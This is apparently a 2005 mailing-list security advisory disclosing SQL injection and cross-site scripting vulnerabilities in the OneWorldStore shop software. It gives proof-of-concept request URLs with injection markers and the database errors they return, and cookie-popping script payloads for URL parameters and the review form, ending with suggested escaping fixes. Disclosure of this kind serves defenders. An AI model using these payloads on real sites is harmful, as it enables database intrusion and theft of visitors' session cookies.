Date: 14 Apr 2005 18:31:17 -0000
From: dcrab <dcrab@hackerscenter.com.>
To: [email protected]Subject: Multiple multiple sql injection/errors and xss vulnerabilities in
OneWorldStore
X-Virus-Scanned: antivirus-gw at tyumen.ru
Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah
Severity: High
Title: Multiple multiple sql injection/errors and xss vulnerabilities in OneWorldStore
Date: 14/04/2005
Vendor: OneWorldStore
Vendor Website: http://www.oneworldstore.com
Summary: There are, multiple sql injection/errors and xss vulnerabilities in oneworldstore.
Proof of Concept Exploits:
http://example.com/owBasket/owAddItem.asp?idProduct='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT stock FROM Products WHERE idProduct = 'SQL_INJECTION
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owBasket/owAddItem.asp, line 48
http://example.com/owListProduct.asp?bSpecials='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT * FROM Categories WHERE idCategory = AND Active = -1
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owListProduct.asp, line 50
http://example.com/owListProduct.asp?idCategory='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT * FROM Categories WHERE idCategory = ''SQL AND Active = -1
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owListProduct.asp, line 50
http://example.com/owProductDetail.asp?idproduct='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT * FROM products WHERE idProduct = ''SQL_INJEC AND active = -1
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owProductDetail.asp, line 647
http://example.com/owProductDetail.asp?sAction=ProductReview&idProduct='SQL_INJECTION&idCategory=40&sUserName=&sUserEmail=&sRating=1&sBody=dcrab
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT * FROM products WHERE idProduct = ''SQL_INJEC AND active = -1
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owProductDetail.asp, line 647
http://example.com/owContactUs.asp?sAction=Contact&sName=&sEmail='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sType=None+Specified&sDescription=dcrab
Pops Cookie
http://example.com/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&idCategory=64http://example.com/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&idCategory=64
Pops Cookie
http://example.com/owProductDetail.asp
Submitting the review form, with someething like
Name:'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Email:'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E@'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.com
Rating:5
Comment: '%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Would cause long lasting permanent XSS and steal the cookies of anyone who visited the webpage.
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems.
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php.
